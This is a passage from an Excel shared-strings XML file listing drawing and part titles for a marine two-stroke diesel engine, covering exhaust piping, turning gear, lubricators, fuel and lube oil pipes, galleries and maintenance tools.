  <si>
    <t>EXHAUST PIPE F. CYL. 8+9</t>
  </si>
  <si>
    <t>BRACING TC AND EXH.PIPES</t>
  </si>
  <si>
    <t>LIFT.OF EXH.RECEIVER FORE</t>
  </si>
  <si>
    <t>LIFT.OF EXH.RECEIVER AFT</t>
  </si>
  <si>
    <t>CROSSBAR-LIFT.OF EXH.REC</t>
  </si>
  <si>
    <t>ARR.OF DIESEL GEN.EXHAUST</t>
  </si>
  <si>
    <t>EXH.PIPE F.CYL.3B,A6</t>
  </si>
  <si>
    <t>EXH.PIPE F.CYL.4B,A5</t>
  </si>
  <si>
    <t>EXH. PIPE F. CYL.7B, A2</t>
  </si>
  <si>
    <t>END COVER AFT.</t>
  </si>
  <si>
    <t>EXH.PIPE F.CYL.1A,B6</t>
  </si>
  <si>
    <t>EXH.PIPE F.CYL.1B,A8</t>
  </si>
  <si>
    <t>EXH. PIPE F. CYL. 2B, A7</t>
  </si>
  <si>
    <t>EXH.PIPE F.CYL. 8B,A1</t>
  </si>
  <si>
    <t>EXHAUST PIPE 2A-B5</t>
  </si>
  <si>
    <t>EXHAUST PIPE 5B,A4</t>
  </si>
  <si>
    <t>EXHAUST PIPE 6B,A3</t>
  </si>
  <si>
    <t>EXHAUST PIPE 3A,B4</t>
  </si>
  <si>
    <t>EXHAUST PIPE 4A,B3</t>
  </si>
  <si>
    <t>EXHAUST PIPE 5A,B2</t>
  </si>
  <si>
    <t>EXHAUST PIPE 6A,B1</t>
  </si>
  <si>
    <t>EXHAUST PIPE INTERMEDIATE</t>
  </si>
  <si>
    <t>ARR. OF BYPASS OF TC</t>
  </si>
  <si>
    <t>PIPE FOR BY-PASS</t>
  </si>
  <si>
    <t>BALANCING ARR. FORE + AFT</t>
  </si>
  <si>
    <t>ARRANGEMENT-FORE</t>
  </si>
  <si>
    <t>ARR.OF FORE END</t>
  </si>
  <si>
    <t>ARR.OF FORE END, WITH PTO</t>
  </si>
  <si>
    <t>TURNING WHEEL - MOUNTING</t>
  </si>
  <si>
    <t>OIL FEED UNIT - COMPLETE</t>
  </si>
  <si>
    <t>OIL FEED UNIT-PIPES COMPL</t>
  </si>
  <si>
    <t>OIL FEED UNIT-PIPECOMPL.</t>
  </si>
  <si>
    <t>TUNING WHEEL ARRANGEMENT</t>
  </si>
  <si>
    <t>MOUNTING OF FLYWHEEL</t>
  </si>
  <si>
    <t>TUNING AND TURNING WHEELS</t>
  </si>
  <si>
    <t>MOUNT. FLYWHEEL AND COUPL</t>
  </si>
  <si>
    <t>FLYWHEEL MOUNTING</t>
  </si>
  <si>
    <t>HYDR.JACK TURNING WHEEL</t>
  </si>
  <si>
    <t>FLAP FOR FLYWHEEL GUARD</t>
  </si>
  <si>
    <t>GUARD FOR PTO-SHAFT</t>
  </si>
  <si>
    <t>MOUNT.OF FLYWHEEL POINTER</t>
  </si>
  <si>
    <t>MOUNT.FLYWHEEL &amp; COUPLING</t>
  </si>
  <si>
    <t>FLYWHEEL ARR. COMPLETE</t>
  </si>
  <si>
    <t>MOUNT.OF DIVIDED GEAR RIM</t>
  </si>
  <si>
    <t>ARR.OF DISENGAGING DEVICE</t>
  </si>
  <si>
    <t>ARRANGEMENT OF ROLLER</t>
  </si>
  <si>
    <t>TURNING GEAR COMPLETE</t>
  </si>
  <si>
    <t>SAFETY DEVICE</t>
  </si>
  <si>
    <t>STARTER COMPLETE</t>
  </si>
  <si>
    <t>STARTER BOX</t>
  </si>
  <si>
    <t>DEAD CENTRE POINTER, ASSY</t>
  </si>
  <si>
    <t>SECURING PIN</t>
  </si>
  <si>
    <t>MOUNTING OF TURNINGMOTOR</t>
  </si>
  <si>
    <t>SEC.PIN FOR TURNINGMOTOR</t>
  </si>
  <si>
    <t>BODY PLATE</t>
  </si>
  <si>
    <t>BRACKET FOR TURNING GEAR</t>
  </si>
  <si>
    <t>ARR. TURN.GEAR INTERLOCK</t>
  </si>
  <si>
    <t>BRACKET FOR CHANGE VALVE</t>
  </si>
  <si>
    <t>PARTS LIST-BRACKET</t>
  </si>
  <si>
    <t>STOP PIN</t>
  </si>
  <si>
    <t>ARR. OF PIPE FOR AIRSTART</t>
  </si>
  <si>
    <t>HOUSE FOR AIR MOTOR</t>
  </si>
  <si>
    <t>SPARE PART DRAWING</t>
  </si>
  <si>
    <t>MOUNT. OF TURNING GEAR</t>
  </si>
  <si>
    <t>ARR. OF START. AIR MOTOR</t>
  </si>
  <si>
    <t>SECURING PIN WITH CHAIN</t>
  </si>
  <si>
    <t>DEAD CENTER POINTER COMPL</t>
  </si>
  <si>
    <t>M. OF DEAD CENTER POINTER</t>
  </si>
  <si>
    <t>DUMMY FOR AIR STARTER</t>
  </si>
  <si>
    <t>FUEL OIL FILTER</t>
  </si>
  <si>
    <t>WASTE TRAY-ALTERATION</t>
  </si>
  <si>
    <t>PIPE FOR VENTING</t>
  </si>
  <si>
    <t>FILTER INSERT</t>
  </si>
  <si>
    <t>MOUNT. OF FUEL OIL FILTER</t>
  </si>
  <si>
    <t>FLAPS</t>
  </si>
  <si>
    <t>ARR.OF LUB.OIL FILTER</t>
  </si>
  <si>
    <t>ASSY OF FILTER INSERT</t>
  </si>
  <si>
    <t>ASSY OF CHAIN DRIVE</t>
  </si>
  <si>
    <t>ASSY OF CHAIN WHEEL</t>
  </si>
  <si>
    <t>ASSY OF SPINDLE GUIDE</t>
  </si>
  <si>
    <t>ASSY OF AIR PIPE</t>
  </si>
  <si>
    <t>PIPE-OIL INLET</t>
  </si>
  <si>
    <t>PIPE-OIL OUTLET</t>
  </si>
  <si>
    <t>PIPE-DRAIN</t>
  </si>
  <si>
    <t>PIPE-AIR</t>
  </si>
  <si>
    <t>PIPE-VENTING</t>
  </si>
  <si>
    <t>FILTER PLATE</t>
  </si>
  <si>
    <t>MOUNT. OF LUB. OIL FILTER</t>
  </si>
  <si>
    <t>INSERT FOR LUB.OIL COOLER</t>
  </si>
  <si>
    <t>COMBI COOLER, MOUNTING</t>
  </si>
  <si>
    <t>MOUNTING OF PLATE COOLER</t>
  </si>
  <si>
    <t>FUNDAMENT FOR COOLER</t>
  </si>
  <si>
    <t>PLATE COOLER ASSEMBLY</t>
  </si>
  <si>
    <t>COMBINED PLATE COOLER</t>
  </si>
  <si>
    <t>NOZZLE OIL COOLER</t>
  </si>
  <si>
    <t>ALCU I</t>
  </si>
  <si>
    <t>ALCU II</t>
  </si>
  <si>
    <t>MOUNTING OF LUBRICATORS</t>
  </si>
  <si>
    <t>GEAR</t>
  </si>
  <si>
    <t>SOLENOID VALVE COMPLETE</t>
  </si>
  <si>
    <t>MEP ARRANGEMENT</t>
  </si>
  <si>
    <t>BRACKET-LUBRICATOR+PUMP</t>
  </si>
  <si>
    <t>BRACKET-LUBRICATOR-PUMP</t>
  </si>
  <si>
    <t>LUBRICATOR + BRACKET</t>
  </si>
  <si>
    <t>HOUSING FOR LUBR. COMPLET</t>
  </si>
  <si>
    <t>SHAFT-LUBRICATOR DRIVE</t>
  </si>
  <si>
    <t>BRACKET-LUBRICATOR DRIVE</t>
  </si>
  <si>
    <t>ECCENTRIC ROD</t>
  </si>
  <si>
    <t>PISTON CONTROL Y56</t>
  </si>
  <si>
    <t>PISTON CONTROL COMPL. Y56</t>
  </si>
  <si>
    <t>CONTROL UNIT, CYL. LUB.</t>
  </si>
  <si>
    <t>SWITCH BOARD UNIT</t>
  </si>
  <si>
    <t>ALCU-COMPLETE</t>
  </si>
  <si>
    <t>WIRING OF EL.LUBRICATOR</t>
  </si>
  <si>
    <t>INSTRUMENT PANEL BRACKET</t>
  </si>
  <si>
    <t>INSTRUMENT PANEL MOUNTING</t>
  </si>
  <si>
    <t>ALPHA LUBRICATOR</t>
  </si>
  <si>
    <t>PARTS LIST-GENERAT.DRIVE</t>
  </si>
  <si>
    <t>ARR.OF TACHO PICK-UPS</t>
  </si>
  <si>
    <t>LIST OF PLATES</t>
  </si>
  <si>
    <t>PRESS. GAUGE PANEL F.PI40</t>
  </si>
  <si>
    <t>PRES.GAUGE PAN PI40-PI23</t>
  </si>
  <si>
    <t>HOUSING F.INSTRUM. PANEL</t>
  </si>
  <si>
    <t>PRESS.GAUGE PANEL FOR HFO</t>
  </si>
  <si>
    <t>ARR. OF PRESS GAUGE PIPE</t>
  </si>
  <si>
    <t>BOX FOR THERMOMETER</t>
  </si>
  <si>
    <t>BOX F. PRESS. GAUGE PANEL</t>
  </si>
  <si>
    <t>SUPPORT F. PRESS. G.PANEL</t>
  </si>
  <si>
    <t>ALARM CLUTCH, WRONG-WAY</t>
  </si>
  <si>
    <t>ALARM INDICATOR</t>
  </si>
  <si>
    <t>EL.HEATER FOR LUBRICATOR</t>
  </si>
  <si>
    <t>PARTS LIST-CONTROL PANEL</t>
  </si>
  <si>
    <t>TEST EQUIP. F.ALPHA-LUBR.</t>
  </si>
  <si>
    <t>LUB.OIL PUMP ASSEMBLY</t>
  </si>
  <si>
    <t>MOUNTING OF PUMPS</t>
  </si>
  <si>
    <t>MOUNT. OF SHAFT FRONT</t>
  </si>
  <si>
    <t>MS.66-AUX.BLOWER+CTRL.EQ.</t>
  </si>
  <si>
    <t>ARR. OF FUEL GAS PIPES</t>
  </si>
  <si>
    <t>GEARWHEEL,</t>
  </si>
  <si>
    <t>FUEL GAS VENTING PIPE</t>
  </si>
  <si>
    <t>RESILIENT GEAR WHEEL</t>
  </si>
  <si>
    <t>MOUNT. OF RES. GEAR WHEEL</t>
  </si>
  <si>
    <t>ARR. OF GEAR WHEEL</t>
  </si>
  <si>
    <t>ORDER LIST-TURBOCHARGER</t>
  </si>
  <si>
    <t>ORDER LIST-AIR COOLER</t>
  </si>
  <si>
    <t>ORDER LIST-COOLER INSERT</t>
  </si>
  <si>
    <t>ORDER LIST-EMERG.BLOWER</t>
  </si>
  <si>
    <t>ORDER LIST-AUX.BLOWER</t>
  </si>
  <si>
    <t>ARR.OF AIR COOLER</t>
  </si>
  <si>
    <t>ARR. OF CUT-OUT VALVE T/C</t>
  </si>
  <si>
    <t>ARR. OF TURBOCHARGER</t>
  </si>
  <si>
    <t>FLYWHEEL MOUNT.</t>
  </si>
  <si>
    <t>ARR.OF CHEM.CLEANING A.C.</t>
  </si>
  <si>
    <t>TUBE W.NOZZLES.AIR COOLER</t>
  </si>
  <si>
    <t>COVER W.GUIDING TUBE</t>
  </si>
  <si>
    <t>MIX.TANK F.CHEM.CLEAN A.C</t>
  </si>
  <si>
    <t>PULLROD F.NOZZLE TUBES</t>
  </si>
  <si>
    <t>GUIDE F. PULLROD. LOWER</t>
  </si>
  <si>
    <t>GUIDE F.PULLROD. UPPER</t>
  </si>
  <si>
    <t>CROSSPIECE F.PULLROD</t>
  </si>
  <si>
    <t>ROLLER BRACKET FOR ROTOR</t>
  </si>
  <si>
    <t>SUPPORT FOR ROTOR</t>
  </si>
  <si>
    <t>GUIDE RAIL A.C. FORE END</t>
  </si>
  <si>
    <t>GUIDE RAIL A.C. REAR END</t>
  </si>
  <si>
    <t>TOOLS FOR ROTOR CLEANING</t>
  </si>
  <si>
    <t>TOOLS FOR EXH. RECEIVER</t>
  </si>
  <si>
    <t>LIFT.TOOL A.C. COMPL.</t>
  </si>
  <si>
    <t>LIFT.ATTACH. A.C.FORE END</t>
  </si>
  <si>
    <t>TOOLS FOR TC-REP. + BLOCK</t>
  </si>
  <si>
    <t>WHEEL FOR AIR COOLER</t>
  </si>
  <si>
    <t>COMPENSATOR DISM. TOOLS</t>
  </si>
  <si>
    <t>TURBOCHARGER BLOCK.TOOLS</t>
  </si>
  <si>
    <t>TRAVELL-TROLLEY F.COOLER</t>
  </si>
  <si>
    <t>TROLLEY F.COOLER INSERT</t>
  </si>
  <si>
    <t>ARR. OF AIR COOLER FRAME</t>
  </si>
  <si>
    <t>ARR.OF AUX.BLOWER DUCTING</t>
  </si>
  <si>
    <t>ARR. OF TC GAS PIPES</t>
  </si>
  <si>
    <t>ARR. OF GAS OUTLET</t>
  </si>
  <si>
    <t>GALL.BRACKET, AFT END</t>
  </si>
  <si>
    <t>GALLERY BRACKET-BRACING</t>
  </si>
  <si>
    <t>GALL.BRACKET FORE</t>
  </si>
  <si>
    <t>TOP BRACING-UPP.-MAN.SIDE</t>
  </si>
  <si>
    <t>TOP BRACING ON AFT END</t>
  </si>
  <si>
    <t>SUPPORT FOR PLATFORM</t>
  </si>
  <si>
    <t>SEATING FOR EXH.RECEIVER</t>
  </si>
  <si>
    <t>SEATING FOR COOLER</t>
  </si>
  <si>
    <t>AIR COOLER FRAME-AFT,MACH</t>
  </si>
  <si>
    <t>AIR COOLER FRAME-AFT,WELD</t>
  </si>
  <si>
    <t>CRANE TRACK</t>
  </si>
  <si>
    <t>PLATFORM-UPPER-REAR SIDE</t>
  </si>
  <si>
    <t>GALL.BRACKET IN CRANKCASE</t>
  </si>
  <si>
    <t>PLATFORM ON BEDPLATE</t>
  </si>
  <si>
    <t>RING W. COPPER COLLAR</t>
  </si>
  <si>
    <t>COLLAR ON FLOOR PLATE</t>
  </si>
  <si>
    <t>SEATING FOR T.C.+EXH.REC.</t>
  </si>
  <si>
    <t>MODIFICATION - GALL. ARR.</t>
  </si>
  <si>
    <t>ILLUMINATION ON PLATFORMS</t>
  </si>
  <si>
    <t>AUX.BLOW.ARR-CHAIN CASING</t>
  </si>
  <si>
    <t>AUX.BLOW.ARR.AT CYLINDER</t>
  </si>
  <si>
    <t>MOUNT.OF GALL.-EXH. SIDE</t>
  </si>
  <si>
    <t>SUPPORT FOR MAN CONSOLE</t>
  </si>
  <si>
    <t>PLATFORM IN CRANKCASE</t>
  </si>
  <si>
    <t>STEP IN CRANKCASE</t>
  </si>
  <si>
    <t>GUARD RAIL AT PUSHROD</t>
  </si>
  <si>
    <t>GUARD RAIL AND PLATF.ARR.</t>
  </si>
  <si>
    <t>MOUNTINGS FOR STOP P.VAL.</t>
  </si>
  <si>
    <t>MOUNTINGS ARR.START.SLIDE</t>
  </si>
  <si>
    <t>SEATING FOR STOP P.VALVE</t>
  </si>
  <si>
    <t>SUPPORT F. STARTING VALVE</t>
  </si>
  <si>
    <t>GUARDS-ARR.</t>
  </si>
  <si>
    <t>LADDER+ARR.DRAWINGS</t>
  </si>
  <si>
    <t>HAND RAIL-SPECIAL</t>
  </si>
  <si>
    <t>PLATFORM-MAN.SIDE ARR.</t>
  </si>
  <si>
    <t>PLATE-MAN.SIDE+END ARR.</t>
  </si>
  <si>
    <t>PLATFORM ARR. FOR TC/AC</t>
  </si>
  <si>
    <t>PLATFORM-LOWER-TOP VIEW</t>
  </si>
  <si>
    <t>PLATFORM-TOP VIEW</t>
  </si>
  <si>
    <t>GALL.BRACK.ARR-CENT.MAN</t>
  </si>
  <si>
    <t>GALL.BRACK.ARR-LOW.MAN</t>
  </si>
  <si>
    <t>GALL.BRACKET ARR.MAN.SIDE</t>
  </si>
  <si>
    <t>GALL.BRACK.+PIPES-UPPER</t>
  </si>
  <si>
    <t>GALL.BRACK.+PIPES-CENTRE</t>
  </si>
  <si>
    <t>GALL.BRACK.+PIPES-LOWER</t>
  </si>
  <si>
    <t>PLATF.ARR.VIEW FROM AFT</t>
  </si>
  <si>
    <t>PLATFORM ARR.-UPPER-MAN.</t>
  </si>
  <si>
    <t>PLATFORM ARR.-CENTRE MAN.</t>
  </si>
  <si>
    <t>PLATFORM ARR.-LOWER MAN.</t>
  </si>
  <si>
    <t>MAN.SIDE-TOP+END VIEW</t>
  </si>
  <si>
    <t>PLATFORM-EXH. SIDE ARR.</t>
  </si>
  <si>
    <t>TOOLS FOR BRACKET</t>
  </si>
  <si>
    <t>GALL.BRACK.ARR-UPPER EXH.</t>
  </si>
  <si>
    <t>GALL.BRACK.ARR-CENT. EXH.</t>
  </si>
  <si>
    <t>GALL.BRACK.ARR-LOWER EXH.</t>
  </si>
  <si>
    <t>GALL.BRACK. ARR. AFT END</t>
  </si>
  <si>
    <t>PLATFORM ARR.-UPPER-EXH.</t>
  </si>
  <si>
    <t>PLATFORM ARR.-CENTRE EXH.</t>
  </si>
  <si>
    <t>REARSIDE-TOP+END VIEW</t>
  </si>
  <si>
    <t>GALL. BRACKET ARRANGEMENT</t>
  </si>
  <si>
    <t>PLATFORM ARR.L-FLOOR PL.</t>
  </si>
  <si>
    <t>MOUNTING OF GALLERY</t>
  </si>
  <si>
    <t>GALLERY</t>
  </si>
  <si>
    <t>LADDER WITH RAILING</t>
  </si>
  <si>
    <t>TIGHTENING CLIP</t>
  </si>
  <si>
    <t>FRAME PARTS</t>
  </si>
  <si>
    <t>ALARM SYSTEM</t>
  </si>
  <si>
    <t>ALARM, THRUSTBEARING</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING,MID.</t>
  </si>
  <si>
    <t>HOUSING COMPLETE</t>
  </si>
  <si>
    <t>BRACKET FOR ALARM</t>
  </si>
  <si>
    <t>HYDRAULIC COUPLING</t>
  </si>
  <si>
    <t>PIPING ASSEMBLY LIST</t>
  </si>
  <si>
    <t>PIPES ON CYLINDER SECTION</t>
  </si>
  <si>
    <t>LIFTING TOOL,THRUST SHAFT</t>
  </si>
  <si>
    <t>HYDR.JACK SEGM STOPPER</t>
  </si>
  <si>
    <t>HYDR.JACK JOURNAL BEARING</t>
  </si>
  <si>
    <t>HYDR.JACK TUNING WHEEL</t>
  </si>
  <si>
    <t>FUEL OIL INLET PIPE</t>
  </si>
  <si>
    <t>FUEL OIL PIPE, INLET</t>
  </si>
  <si>
    <t>FUEL O.PIPE INLET-OUTLET</t>
  </si>
  <si>
    <t>EXTERNAL PIPE CONNECTIONS</t>
  </si>
  <si>
    <t>SUNDRY PIPES-CYL.PART</t>
  </si>
  <si>
    <t>BRANCH LINE-FUEL OIL</t>
  </si>
  <si>
    <t>SUNDRY PIPES-FORE</t>
  </si>
  <si>
    <t>SUNDRY PIPES-AFT</t>
  </si>
  <si>
    <t>SUNDRY PIPES-LONGITUDINAL</t>
  </si>
  <si>
    <t>MAIN PIPE-FUEL OIL</t>
  </si>
  <si>
    <t>PIPE FOR VALVE</t>
  </si>
  <si>
    <t>MAIN PIPES-UPPER MAN.SIDE</t>
  </si>
  <si>
    <t>MAIN PIPE-ASSEMBLY MAN.S.</t>
  </si>
  <si>
    <t>MAIN PIPE FUEL OIL INLET</t>
  </si>
  <si>
    <t>MAIN PIPE FUEL OIL OUTLET</t>
  </si>
  <si>
    <t>FUEL OIL PIPE-RETURN</t>
  </si>
  <si>
    <t>SUPPORT-FUEL OIL,FIXED</t>
  </si>
  <si>
    <t>MAIN PIPE-FUEL OIL OUTLET</t>
  </si>
  <si>
    <t>COOLING OIL-FUEL VALVE</t>
  </si>
  <si>
    <t>SUPPORTS</t>
  </si>
  <si>
    <t>FUEL OIL PIPE-OUTLET</t>
  </si>
  <si>
    <t>DRAIN PIPE-FUEL OIL</t>
  </si>
  <si>
    <t>FUEL OIL PIPE OUT.VALVE</t>
  </si>
  <si>
    <t>VENTILATING PIPE</t>
  </si>
  <si>
    <t>DRAIN PIPE-SHOCK ABSORBER</t>
  </si>
  <si>
    <t>ARR.OF FUEL OIL DRAIN BOX</t>
  </si>
  <si>
    <t>DRAIN PIPE-CAMSHAFT FRAME</t>
  </si>
  <si>
    <t>OVERFLOW-FUEL OIL</t>
  </si>
  <si>
    <t>FUEL OIL PIPE - INLET</t>
  </si>
  <si>
    <t>FUEL OIL PUMP-HEATING</t>
  </si>
  <si>
    <t>HEATING PIPE FUEL PUMP</t>
  </si>
  <si>
    <t>F.O.RETURN FROM UMBR.SEAL</t>
  </si>
  <si>
    <t>FUEL OIL HP PIPE COMPLETE</t>
  </si>
  <si>
    <t>FUEL OIL HP PIPE, DOUBLE</t>
  </si>
  <si>
    <t>HOSE UNION</t>
  </si>
  <si>
    <t>INSULATION OF HP PIPES</t>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN FUEL OIL</t>
  </si>
  <si>
    <t>DRAIN F. SHOCK ABSORBER</t>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN UMBRELLA</t>
  </si>
  <si>
    <t>DRAIN PIPE,UMBRELLA</t>
  </si>
  <si>
    <t>DRAIN-NC VALVE+SHOCK ABS.</t>
  </si>
  <si>
    <t>DRAIN F. FUEL OIL PUMP</t>
  </si>
  <si>
    <t>AIR INLET TO FUEL PUMP</t>
  </si>
  <si>
    <t>DRAIN-H.P. PIPES CHECKING</t>
  </si>
  <si>
    <t>PUMP LEAKAGE SYSTEM</t>
  </si>
  <si>
    <t>ARR. OF F.O. REG. VALVE</t>
  </si>
  <si>
    <t>BY-PASS PIPE</t>
  </si>
  <si>
    <t>MAIN PIPE-COOLING OIL</t>
  </si>
  <si>
    <t>HOLDER FOR ORIFICE</t>
  </si>
  <si>
    <t>MAIN PIPE, UPPER MAN SIDE</t>
  </si>
  <si>
    <t>FUEL OIL REG. VALVE</t>
  </si>
  <si>
    <t>ARR. OF HIGH PRESS. PIPE</t>
  </si>
  <si>
    <t>ARR. BRACKETS CYL. SEC.</t>
  </si>
  <si>
    <t>SEALING OIL DISTRIB. PIPE</t>
  </si>
  <si>
    <t>FUEL OIL DISTRIBUTOR PIPE</t>
  </si>
  <si>
    <t>ARR. OF DRAIN PIPE</t>
  </si>
  <si>
    <t>ARR. OF FUEL OIL PIPE</t>
  </si>
  <si>
    <t>ARR. OF COOLING OIL PIPE</t>
  </si>
  <si>
    <t>COOLING OIL COLL. PIPE</t>
  </si>
  <si>
    <t>DRAIN FROM ENGINE</t>
  </si>
  <si>
    <t>FUEL OIL INLET FILTER</t>
  </si>
  <si>
    <t>OUTLET FILTER INL. ENGINE</t>
  </si>
  <si>
    <t>FUEL OIL DELIVERY PIPE</t>
  </si>
  <si>
    <t>BRACKET F.FUEL OIL FILTER</t>
  </si>
  <si>
    <t>ARR. OF BRANCH PIPES</t>
  </si>
  <si>
    <t>BRACKET F.FUEL OIL PIPE</t>
  </si>
  <si>
    <t>2-WAY BALL VALVE W.ACTUAT</t>
  </si>
  <si>
    <t>BOX FOR OIL DISCHARGER</t>
  </si>
  <si>
    <t>LOOP EXPANSION JOINT</t>
  </si>
  <si>
    <t>INSTALL.OF EXPANSION LOOP</t>
  </si>
  <si>
    <t>MOUNT. OF MAIN PIPES</t>
  </si>
  <si>
    <t>MAIN PIPE</t>
  </si>
  <si>
    <t>MAIN PIPE CYL. SECTION</t>
  </si>
  <si>
    <t>MAIN PIPE FOR SEALING OIL</t>
  </si>
  <si>
    <t>PIPE INLET FUEL OIL PUMP</t>
  </si>
  <si>
    <t>FUEL OIL ARRANGEMENT</t>
  </si>
  <si>
    <t>SHIELDED FUEL INJECT.PIPE</t>
  </si>
  <si>
    <t>ASS.SHIELD FUEL INJ.PIPE</t>
  </si>
  <si>
    <t>FUEL INJ.PIPE-STRAIGHT</t>
  </si>
  <si>
    <t>SOCKET FOR PROTEC. HOSE</t>
  </si>
  <si>
    <t>COVER F. FLEX.HOSE COMPL.</t>
  </si>
  <si>
    <t>FUEL OIL SYSTEM, DETAILS</t>
  </si>
  <si>
    <t>ARR. OF DRAIN</t>
  </si>
  <si>
    <t>FUEL OIL VENTING BOX</t>
  </si>
  <si>
    <t>FUNNEL-FUEL OIL</t>
  </si>
  <si>
    <t>PIPES ON CYL.SECTION</t>
  </si>
  <si>
    <t>PIPES ON FORE END</t>
  </si>
  <si>
    <t>COOLING OIL DISTR. PIPE</t>
  </si>
  <si>
    <t>COOLING OIL COLL.PIPE</t>
  </si>
  <si>
    <t>FUEL OIL DRAIN PIPE</t>
  </si>
  <si>
    <t>FUEL OIL INLET-PRIM.PUMP</t>
  </si>
  <si>
    <t>BRACKET FOR F.O. FILTER</t>
  </si>
  <si>
    <t>FUEL-OIL FILTER MOUNTING</t>
  </si>
  <si>
    <t>DRAIN BOX</t>
  </si>
  <si>
    <t>ADJUSTABLE ELBOW COUPLING</t>
  </si>
  <si>
    <t>PRESSURE GAUGE VALVE</t>
  </si>
  <si>
    <t>DRAIN PIPE-EXHAUST VALVE</t>
  </si>
  <si>
    <t>PIPES FOR AIR,EXH.VALVE</t>
  </si>
  <si>
    <t>LIFTING DEVICE CYL.1</t>
  </si>
  <si>
    <t>ARR.OF LIFTING DEVICE</t>
  </si>
  <si>
    <t>MOUNTING OF DIAPHRAGM</t>
  </si>
  <si>
    <t>ARR.OF OVERSPEED CONTROL</t>
  </si>
  <si>
    <t>SAFETY VALVE COMPLETE</t>
  </si>
  <si>
    <t>ZERO SETTING OF FUEL PUMP</t>
  </si>
  <si>
    <t>PIPES-ZERO SETTING-F.PUMP</t>
  </si>
  <si>
    <t>PIPES FOR ALARM SYSTEM</t>
  </si>
  <si>
    <t>PIPES FOR LIFTING DEVICE</t>
  </si>
  <si>
    <t>DEVICE FOR ALARM SYSTEM</t>
  </si>
  <si>
    <t>CONTROL AIR PIPES</t>
  </si>
  <si>
    <t>CONTROL AIR PIPES CYL.</t>
  </si>
  <si>
    <t>CONTROL AIR PIPES AFT</t>
  </si>
  <si>
    <t>PROTECTION ARR.-H.P.PIPE</t>
  </si>
  <si>
    <t>CUT.+GRIND.TOOL-H.P.PIPE</t>
  </si>
  <si>
    <t>TOOLS F.NON RETURN VALVE</t>
  </si>
  <si>
    <t>CUTT.TOOL-F.OIL PIPE+SEAT</t>
  </si>
  <si>
    <t>CUT.TOOL-SEAT-DISTR.PIECE</t>
  </si>
  <si>
    <t>MILL.TOOL-FUEL OIL PIPE</t>
  </si>
  <si>
    <t>PIN WRENCH, HP FUEL PIPE</t>
  </si>
  <si>
    <t>PRESS. TEST TOOLS HP PIPE</t>
  </si>
  <si>
    <t>PARTS LIST-LUBRICAT.OIL</t>
  </si>
  <si>
    <t>SYSTEM OIL INLET</t>
  </si>
  <si>
    <t>SYSTEM OIL INLET PIPE</t>
  </si>
  <si>
    <t>VARIOUS PIPES-EXH.SIDE</t>
  </si>
  <si>
    <t>LUB.OIL VALVE+ACTUATOR</t>
  </si>
  <si>
    <t>MAIN PIPE-LUBRICATING OIL</t>
  </si>
  <si>
    <t>PIPE BEND-COOLING OIL</t>
  </si>
  <si>
    <t>PIPES FOR GENERATOR ARR.</t>
  </si>
  <si>
    <t>L.O.PIPE-TRANSMIS.GEAR</t>
  </si>
  <si>
    <t>ENGINE PIPES MAN. SIDE</t>
  </si>
  <si>
    <t>ENGINE PIPES EXH. SIDE</t>
  </si>
  <si>
    <t>ENGINE PIPES COMPLETE</t>
  </si>
  <si>
    <t>SUPPORT LUB. OIL</t>
  </si>
  <si>
    <t>SUPPORT-LUB.OIL BEDPLATE</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-VIBR.DAMPER</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-CHAIN BOX</t>
  </si>
  <si>
    <t>L.O.PIPE-JOURNAL BEARING</t>
  </si>
  <si>
    <t>MAIN PIPE-LUB.OIL T.C.</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-PUMP DRIVE</t>
  </si>
  <si>
    <t>LUBRICATING OIL PIPE-AFT</t>
  </si>
  <si>
    <t>L.O.PIPE-MOMENT COMPENS.</t>
  </si>
  <si>
    <t>L.O.PIPE-AXIAL VIBR.DETU.</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-THRUST BRG.</t>
  </si>
  <si>
    <t>L.O.PIPE-TORQUE EQUALIZER</t>
  </si>
  <si>
    <t>LUB. OIL PIPE-CYL.LUB.</t>
  </si>
  <si>
    <t>FLANGES</t>
  </si>
  <si>
    <t>FLANGE WITH STUDS</t>
  </si>
  <si>
    <t>LUB.OIL INLET FUEL PUMP</t>
  </si>
  <si>
    <t>VAR.HYDRAULIC DRG.F.INMOS</t>
  </si>
  <si>
    <t>MECH. REDUNDANCY ACTUATOR</t>
  </si>
  <si>
    <t>FLUSHING HYDR.OIL</t>
  </si>
  <si>
    <t>LUB.OIL PIPE INVA VALVE</t>
  </si>
  <si>
    <t>VAR.PIPES-UPPER GALL.MAN.</t>
  </si>
  <si>
    <t>PIPES-UPPER GALLERY-MAN.</t>
  </si>
  <si>
    <t>DRAIN PIPE-STUFFING BOX</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-CAMSHAFT</t>
  </si>
  <si>
    <t>MAIN PIPE CYL.LUBRICATION</t>
  </si>
  <si>
    <t>PIPES ON BEDPLATE</t>
  </si>
  <si>
    <t>VAR.PIPES-CAMSHAFT FRAME</t>
  </si>
  <si>
    <t>VARIOUS PIPES, MAN.SIDE</t>
  </si>
  <si>
    <t>VARIOUS PIPES-CYL.FRAME</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-AMPLIFIER</t>
  </si>
  <si>
    <t>DRAINP. ASSY SCAV AIR REC</t>
  </si>
  <si>
    <t>DRAINP. ASSY BEDPLATE MAN</t>
  </si>
  <si>
    <t>DRAINP. ASSY BEDPLATE EXH</t>
  </si>
  <si>
    <t>MAIN PIPE-L.O.IN.CAMSHAFT</t>
  </si>
  <si>
    <t>DRAIN, STUFF.BOX+BEDPLATE</t>
  </si>
  <si>
    <t>SUPPORT VAR. DRAIN PIPES</t>
  </si>
  <si>
    <t>LUB.OIL.P.OUTL.,LUB.GEAR</t>
  </si>
  <si>
    <t>MAIN PIPE-L.O.OUT.CAMSH.</t>
  </si>
  <si>
    <t>CYL.LUB.OIL PIPE</t>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN STUFF.BOX</t>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN BEDPLATE</t>
  </si>
  <si>
    <t>SUPPORT-DRAIN BEDPLATE</t>
  </si>
  <si>
    <t>DRAIN-HYDRAULIC+LUB.OIL</t>
  </si>
  <si>
    <t>INFI PRESSURE (P)</t>
  </si>
  <si>
    <t>INVA PRESSURE (P)</t>
  </si>
  <si>
    <t>OUTLET SYSTEM (T)</t>
  </si>
  <si>
